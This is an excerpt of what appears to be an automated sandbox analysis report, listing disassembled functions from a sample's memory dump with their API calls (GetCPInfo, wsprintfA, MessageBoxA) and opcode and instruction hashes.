• Instruction Fuzzy Hash: 40C00231806138AECB963B65FE0684A7F27FB062A03052477A204539348E222C60EFC0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 004DC982
Strings
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: d261f527e5a14526ce43e8e23a2b04623fad47918318fcb2d2891b08a5a2917e
• Instruction ID: ed2bb2f592456c3ac6e88b19c576b219728a922f882575fe8004a79d809fe7bf
• Opcode Fuzzy Hash: d261f527e5a14526ce43e8e23a2b04623fad47918318fcb2d2891b08a5a2917e
• Instruction Fuzzy Hash: BC515CB190814396CB117725CBB176B7B98AB40711F204EABE485423E9EF7C8C95DA4F
APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 004E413A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: 731f48c3a7a7a445644aaf33d773bd1a00500f2f8a73bf7342f2014b281573be
• Instruction ID: 71c51763917af1eba3464a5af13962174293ddba566a5ddaecb3de985469b83f
• Opcode Fuzzy Hash: 731f48c3a7a7a445644aaf33d773bd1a00500f2f8a73bf7342f2014b281573be
• Instruction Fuzzy Hash: DB41CE714041D81EDF128B52CC49BFB7FEADB46745F1400E6E78AC7252C2784988C77A
APIs
• wsprintfA.USER32 ref: 004CA0DC
• MessageBoxA.USER32(00000000,?,error,00000010), ref: 004CA126
Strings
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Messagewsprintf
• String ID: error
• API String ID: 300413163-1574812785
• Opcode ID: 3461fc2ce876a255f9b5bbe413afaec7438acb6ca586c2e353a46239d1d95c10
• Instruction ID: 298ecb71bad3f8301992b0c2b6d386c73045a946b9787b9d899064d252594911
• Opcode Fuzzy Hash: 3461fc2ce876a255f9b5bbe413afaec7438acb6ca586c2e353a46239d1d95c10
• Instruction Fuzzy Hash: 5501B578504304ABE750DF14DC96FEB33ADAB85708F04041DF94997281DAB4999487A7